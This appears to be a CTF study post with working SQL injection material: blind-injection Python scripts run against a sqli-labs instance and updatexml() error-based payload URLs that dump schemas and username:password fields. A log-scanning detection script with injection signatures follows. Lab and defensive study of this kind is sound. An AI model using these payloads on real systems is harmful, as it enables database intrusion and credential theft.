Some commonly used SQL injection scripts and payloads from CTF challenges, recorded here for now.
Boolean-based blind injection
sqlilab Less-8
Using one of the sqli-labs environments to learn how to write the script:
First, brute-force the database name; the script is attached:
import requests

url_0 = "http://dd82d9c9-1380-43e2-afc9-cb70f7c3c368.node3.buuoj.cn/Less-5/?id="
mark = "You are in"   # text that appears in the page only when the injected condition is true

def get_database(url_0):
    name = ''
    for j in range(1, 10):          # position of the character being tested
        for i in range(48, 127):    # printable ASCII range
            payload = "1' and ascii(mid(database(), %d, 1))=%d--+" % (j, i)
            r = requests.get(url_0 + payload)
            if mark in r.text:      # true branch: this character matched
                name = name + chr(i)
                print(name)
                break
    print("database_name:" + name)

get_database(url_0)
Then the table names:
def get_tables(url_0):
    tables = []
    name = ''
    for k in range(0, 4):               # k-th table (limit k, 1)
        for j in range(1, 10):          # position of the character being tested
            for i in range(48, 127):    # printable ASCII range
                payload = "1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit %d, 1), %d, 1))=%d--+" % (k, j, i)
                r = requests.get(url_0 + payload)
                if mark in r.text:
                    name = name + chr(i)
                    print(name)
                    break
        tables.append(name)
        name = ''
    print('table_name:', tables)

get_tables(url_0)
Then the columns; the principle is about the same as dumping the tables:
def get_column(url_0):
    columns = []
    name = ''
    for k in range(0, 4):               # k-th column (limit k, 1)
        for j in range(1, 10):          # position of the character being tested
            for i in range(48, 127):    # printable ASCII range
                payload = "1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit %d, 1), %d, 1))=%d--+" % (k, j, i)
                r = requests.get(url_0 + payload)
                if mark in r.text:
                    name = name + chr(i)
                    print(name)
                    break
        columns.append(name)
        name = ''
    print('column_name:', columns)

get_column(url_0)
Is this IP for real? Fine, luckily it doesn't matter, otherwise I'd be baffled.. Next comes dumping the field contents, and the code is all the same..
Error-based injection
updatexml()
Payloads attached:
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
Dump the database
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select schema_name),0x7e) FROM admin limit 0,1),0x7e),1)
Dump the tables
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select table_name),0x7e) FROM admin limit 0,1),0x7e),1)
Dump the columns
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select column_name),0x7e) FROM admin limit 0,1),0x7e),1)
Dump the field contents
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
Last time I ran into a challenge where the output would not display in full, so I also used the mid() function to show the last 32 characters and then pieced the right and left halves together:
?id=1 and (updatexml(1,concat(0x7e,mid((select group_concat(flag) from flag),32),0x7e),1));
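From the defender's side, both techniques above leave a recognisable trace in web-server logs: the blind script sends many near-identical requests that differ only in the compared ASCII value, and the updatexml() payloads always wrap a concat() call. The following is an added detection example (not code from the original post); the log lines, IPs and paths are constructed for illustration, and the signatures are an assumption drawn from the payload shapes shown on this page.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format); the query strings
# mirror the boolean-blind and updatexml() payload shapes on this page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /Less-5/?id=1%27%20and%20ascii%28mid%28database%28%29%2C%201%2C%201%29%29%3D115--%2B HTTP/1.1" 200 720
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /Less-5/?id=1%27%20and%20ascii%28mid%28database%28%29%2C%201%2C%201%29%29%3D116--%2B HTTP/1.1" 200 690
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /sql.php?id=1%20and%20updatexml%281%2Cconcat%280x7e%2C%28SELECT%20database%28%29%29%2C0x7e%29%2C1%29 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:12:00:03 +0000] "GET /sql.php?id=1 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)')

# Signatures (assumed) for the two techniques shown above: char-by-char boolean
# comparison on ascii(mid/substr(...)) and error-based extraction via updatexml().
SIGNATURES = {
    "boolean_blind": re.compile(r"ascii\s*\(\s*(mid|substr)\s*\(", re.I),
    "error_based":   re.compile(r"(updatexml|extractvalue)\s*\(.*concat\s*\(", re.I),
}

def classify(path):
    """Return the set of signature names matched by a URL-decoded request path."""
    decoded = unquote_plus(path)
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}

def scan_log(text):
    """Yield (ip, path, matches) for every log line that matches a signature."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m["path"])
        if hits:
            yield m["ip"], m["path"], hits

def summarize(text):
    """Count flagged requests per (source IP, technique). A blind-injection run
    shows up as a burst of requests from one client that differ only in the
    compared value, so a high count for one IP is the thing to alert on."""
    counts = Counter()
    for ip, _path, hits in scan_log(text):
        for h in hits:
            counts[(ip, h)] += 1
    return counts

if __name__ == "__main__":
    for (ip, technique), n in summarize(SAMPLE_LOG).items():
        print("%s  %-14s %d request(s)" % (ip, technique, n))
```

The same signatures can be fed to a WAF or SIEM rule; the per-IP count is what separates a single probe from an automated extraction loop like the scripts above.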